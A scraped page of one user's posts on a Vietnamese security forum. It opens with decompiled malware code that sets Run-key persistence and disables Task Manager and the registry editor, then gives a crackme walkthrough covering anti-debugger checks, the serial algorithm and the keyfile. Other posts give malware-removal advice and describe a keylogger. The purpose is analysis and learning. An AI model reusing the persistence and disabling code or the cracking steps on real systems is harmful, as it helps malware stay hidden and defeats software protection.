loc_0040C9FE: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h))
loc_0040CA0A: call MSVBVM60.DLL.__vbaFreeStr
loc_0040CA13: call MSVBVM60.DLL.__vbaFreeVar
loc_0040CA24: var_000000B4 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vknt"
loc_0040CA2E: var_000000BC = 8
loc_0040CA38: call ecx+000006F8h(arg_08, esi+4Ch, var_18)
loc_0040CA40: If ecx+000006F8h(arg_08, esi+4Ch, var_18) < 0 Then
loc_0040CA4E: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+000006F8h(arg_08, esi+4Ch, var_18), arg_08, 00405544h, 000006F8h)
loc_0040CA54: End If
loc_0040CA5D: call &("Unt32.exe", var_18)
loc_0040CA71: var_4C = 8
loc_0040CA74: var_000000EC = 8
loc_0040CAE4: call MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h)
loc_0040CAE7: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h))
loc_0040CAF3: call MSVBVM60.DLL.__vbaFreeStr
loc_0040CAFC: call MSVBVM60.DLL.__vbaFreeVar
loc_0040CB0D: var_000000B4 = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ctfcomon"
loc_0040CB17: var_000000BC = 8
loc_0040CB21: call ecx+000006F8h(arg_08, esi+4Ch, var_18)
loc_0040CB29: If ecx+000006F8h(arg_08, esi+4Ch, var_18) < 0 Then
loc_0040CB37: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+000006F8h(arg_08, esi+4Ch, var_18), arg_08, 00405544h, 000006F8h)
loc_0040CB3D: End If
loc_0040CB46: call &("Unt32.exe", var_18)
loc_0040CB5A: var_4C = 8
loc_0040CB5D: var_000000EC = 8
loc_0040CBCD: call MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h)
loc_0040CBD0: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h))
loc_0040CBDC: call MSVBVM60.DLL.__vbaFreeStr
loc_0040CBE5: call MSVBVM60.DLL.__vbaFreeVar
loc_0040CBF5: var_000000BC = 8
loc_0040CBFB: var_000000FC = 8
loc_0040CC0E: var_000000B4 = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
loc_0040CC78: call MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h)
loc_0040CC7B: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h))
loc_0040CC8B: var_000000BC = 8
loc_0040CC91: var_000000FC = 8
loc_0040CCA4: var_000000B4 = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskmgr"
loc_0040CD0E: call MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h)
loc_0040CD11: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h))
loc_0040CD25: call ecx+000006F8h(arg_08, esi+4Ch, var_18)
loc_0040CD2D: If ecx+000006F8h(arg_08, esi+4Ch, var_18) < 0 Then
loc_0040CD3B: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+000006F8h(arg_08, esi+4Ch, var_18), arg_08, 00405544h, 000006F8h)
loc_0040CD41: End If
loc_0040CD4A: call &("Unt32.exe", var_18)
loc_0040CD5F: var_5C = 8
loc_0040CD66: var_4C = Chr(00000022h)
loc_0040CD71: var_000000B4 = "%1"
loc_0040CD7B: var_000000BC = 8
loc_0040CD85: var_0000008C = Chr(00000022h)
loc_0040CD9D: var_0000010C = 8
loc_0040CDB0: var_000000C4 = "%*"
loc_0040CDD5: call MSVBVM60.DLL.__vbaVarCat("", var_4C, var_5C)
loc_0040CDE3: call MSVBVM60.DLL.__vbaVarCat("", var_000000BC, MSVBVM60.DLL.__vbaVarCat("", var_4C, var_5C))
loc_0040CDF4: call MSVBVM60.DLL.__vbaVarCat("", var_0000008C, MSVBVM60.DLL.__vbaVarCat("", var_000000BC, MSVBVM60.DLL.__vbaVarCat("", var_4C, var_5C)))
loc_0040CE05: call MSVBVM60.DLL.__vbaVarCat("", 8, MSVBVM60.DLL.__vbaVarCat("", var_0000008C, MSVBVM60.DLL.__vbaVarCat("", var_000000BC, MSVBVM60.DLL.__vbaVarCat("", var_4C, var_5C))))
loc_0040CE51: call MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h)
loc_0040CE54: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h))
loc_0040CE60: call MSVBVM60.DLL.__vbaFreeStr
loc_0040CE9B: GoTo loc_40CF06
loc_0040CF05: ret
loc_0040CF06: 'Referenced from 0040CE9B
loc_0040CF06: ret
loc_0040CF0D: call ecx+08h(arg_08)
loc_0040CF23: retn 0004h
End Sub



Bác nàm thí thì tạo công việc cho anh Quảng rồi,!
Thảo luận hệ điều hành Windows  Empty  Go to message
C++ chỉ có thể dịch sang mã ASM bằng cách dùng một Debugger User hoặc Kernel mode là SoftIce, IDA hay OllyDBG để xem. Dùng Hexray thì có thể xem được pseudo code nhưng phần mềm này rất đắt, và không khả thi với những file có dung lượng lớn.

Tôi đoán chương trình của bạn đã bị pack. Dùng Peid (peid.info) để xem bị pack bằng gì. Sau khi xác định bị pack bằng gì thì vào Google gõ tên packer+unpacker( ví dụ UPX+unpacker).

Thân!
Thủ thuật reverse engineering  Empty  Go to message
Tui lười quá smilie .

-Trước hết nó dùng API FindWindow để tìm OllyDBG và SND OllyMod-

Code:
int __cdecl sub_401290()
{
HWND v1; // eax@1
int v2; // [sp+14h] [bp-4h]@1
HWND v3; // [sp+10h] [bp-8h]@1
v2 = 0;
v1 = FindWindowA("OllyDBG", 0);
v3 = v1;
if ( v1 )
GetWindowThreadProcessId(v3, (DWORD *)&v2);
++dword_405014;
return v2;
}


-Chuỗi:
Code:
]sy$Wgvi{ih$qi$222$Xlerow$jsv$vikmwxivmrk$xlmw$gvegoqi$%$

Code:
Mrzepmh$Wivmep$$

có nghĩa:

Code:
You Screwed me ... Thanks for registering this crackme !

Code:
Invalid Serial


-Tên name <11
-Tên serial <16

Code:
0040179D |. E8 AE0A0000 CALL <JMP.&msvcrt.strlen> ; |\strlen
004017A2 |. 83F8 0B CMP EAX,0B ; |
004017A5 |. 0F87 ED020000 JA ScrewMe_.00401A98 ; |
004017AB |. 807D E8 00 CMP BYTE PTR SS:[EBP-18],0 ; |
004017AF |. 0F84 CD020000 JE ScrewMe_.00401A82 ; |
004017B5 |. 8D45 E8 LEA EAX,DWORD PTR SS:[EBP-18] ; |
004017B8 |. 890424 MOV DWORD PTR SS:[ESP],EAX ; |
004017BB |. E8 900A0000 CALL <JMP.&msvcrt.strlen> ; \strlen
004017C0 |. 83F8 10 CMP EAX,10


-Chuyển ký sang mã ascii, lặp cho đến hết, sau đó cộng với nhau:

Code:
004017C9 |. C785 38FFFFFF >MOV DWORD PTR SS:[EBP-C8],0
004017D3 |> 8D45 D8 /LEA EAX,DWORD PTR SS:[EBP-28] ; |
004017D6 |. 890424 |MOV DWORD PTR SS:[ESP],EAX ; |
004017D9 |. E8 720A0000 |CALL <JMP.&msvcrt.strlen> ; \strlen
004017DE |. 3985 38FFFFFF |CMP DWORD PTR SS:[EBP-C8],EAX
004017E4 |. 73 1E |JNB SHORT ScrewMe_.00401804
004017E6 |. 8D45 F8 |LEA EAX,DWORD PTR SS:[EBP-8]
004017E9 |. 0385 38FFFFFF |ADD EAX,DWORD PTR SS:[EBP-C8]
004017EF |. 83E8 20 |SUB EAX,20
004017F2 |. 0FBE10 |MOVSX EDX,BYTE PTR DS:[EAX]
004017F5 |. 8D45 D4 |LEA EAX,DWORD PTR SS:[EBP-2C]
004017F8 |. 0110 |ADD DWORD PTR DS:[EAX],EDX
004017FA |. 8D85 38FFFFFF |LEA EAX,DWORD PTR SS:[EBP-C8]
00401800 |. FF00 |INC DWORD PTR DS:[EAX]
00401802 |.^EB CF \JMP SHORT ScrewMe_.004017D3


Thí dụ hacnho=68+61+63+6E+68+6F= 271 hex = 625 dec.

-Nhân kết quả trên cho 10

Code:
00401804 |> 8B55 D4 MOV EDX,DWORD PTR SS:[EBP-2C] ; |||
00401807 |. 89D0 MOV EAX,EDX ; |||
00401809 |. C1E0 02 SHL EAX,2 ; |||
0040180C |. 01D0 ADD EAX,EDX ; |||
0040180E |. 01C0 ADD EAX,EAX ; |||


-Đổi HEX sang DEC:

Code:
0040182C |. E8 0F0A0000 CALL <JMP.&msvcrt.sprintf> ; ||\sprintf



-Chuỗi trên + với "-":

Code:
0040184D |. C645 EC 2D MOV BYTE PTR SS:[EBP-14],2D ; |


-Đưa 1984 vào EAX, chắc là năm sinh của nó smilie.
Code:
00401868 |. 05 C0070000 ADD EAX,7C0 ; |


Nhân 1984 với kết quả đổi sang DEC:

Code:
v11 = v9 * (v24 + v22 + v23 + 1984);


Lấy serial của ổ cứng bằng hàm GetVolumeInformationA, đẩy sổ serial này vô buffer tại 405030
Code:
0022FED0 004041A1 |RootPathName = "C:\"
0022FED4 00405024 |VolumeNameBuffer = ScrewMe_.00405024
0022FED8 0000000C |MaxVolumeNameSize = C (12.)
0022FEDC 00405040 |pVolumeSerialNumber = ScrewMe_.00405040
0022FEE0 00000000 |pMaxFilenameLength = NULL
0022FEE4 00000000 |pFileSystemFlags = NULL
0022FEE8 00405030 |pFileSystemNameBuffer = ScrewMe_.00405030
0022FEEC 00000010 \pFileSystemNameSize = 00000010


-Nhân 1984 với chuỗi ban đầu và xor với số serial ổ c:

v12 = v9 * (v24 + v22 + v23 + 1984) ^ dword_405040;

-Kết hợp chuỗi này thành số serial. Tuy nhiên đến đây vẫn chưa xong, nó vẫn báo invalid serial. Restart lại Olly, nhập vào chuỗi vừa có (62501-1003445255). Trace tới đây, sẽ gặp API CreateFileA:

Code:
00401989 |. 890424 MOV DWORD PTR SS:[ESP],EAX ; |
0040198C |. E8 6F020000 CALL <JMP.&KERNEL32.CreateFileA> ; \CreateFileA
00401991 |. 83EC 1C SUB ESP,1C


Code:
0022F9D0 0022FA50 |FileName = "EarnUrRight.dat"
0022F9D4 80000000 |Access = GENERIC_READ
0022F9D8 00000001 |ShareMode = FILE_SHARE_READ
0022F9DC 00000000 |pSecurity = NULL
0022F9E0 00000003 |Mode = OPEN_EXISTING
0022F9E4 00000080 |Attributes = NORMAL
0022F9E8 00000000 \hTemplateFile = NULL


Trace tới đây sẽ gặp chuỗi:
Code:
00401A0B |. 8D45 F8 |LEA EAX,DWORD PTR SS:[EBP-8]
ECX 0022FA00 ASCII "Allow Me to Retort!"


Như vậy keyfile sẽ có nội dung như thế.

Xong smilie
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
Hi all, tui nghĩ chắc lại một chú Vn nào lại nghịch nữa rồi. smilie Icare cũng bó tay hẻm. Giờ bạn xem trong task man coi phải có 2 process tên là pha1.exe không. Nếu có bác tìm chỗ lưu trữ con này, nén lại với pass là infected rồi send mail hacnho@hotmail.com để tui xem dùm cho smilie hoặc report cho AV như BitDefender hay Symantec cũng được .


PS:Nó giống vầy đúng không:





Thảo luận hệ điều hành Windows  Empty  Go to message
Trong router, bạn vào phần Security > Content Filter > Keyword (tùy loại), nhập các website và từ khóa muốn chặn.
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
Thì bạn dùng Process Explorer hay RunScanner để xem coi có process lạ nào và end nó đi. Nếu end ko được thì ghi nhớ tên, boot vào Dos và diệt tay. Nếu là dạng lây đa hình thì chịu khó cài AV nào đó để diệt đi smilie!
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
Một loại keylog sơ khai, được tung ra vào cuối 98 đầu 99 và trở thành một con open source được phát triển lên 2.5 và 2.5 mod. File chạy mang tên Infected.exe có icon hình setup, dung lượng 30Kbs. Nó có tác dụng ghi lại mọi thao tác gõ bàn phím, mã hóa thông điệp này và dùng giao thức smtp để gửi mail về cho chủ. Tự ghi khóa HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices để chạy ngầm. Vô cùng dễ diệt smilie!

Thay vì đi khắp các diễn đàn rêu rao nhờ người tìm, sao không hỏi Mr. Google smilie?
Thảo luận hệ điều hành Windows  Empty  Go to message
Sao không xài phần mềm Việt Nam nhỉ smilie

http://www.tpacontrol.com/
 
Go to Page:  First Page 1 2 3 5 6 7 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|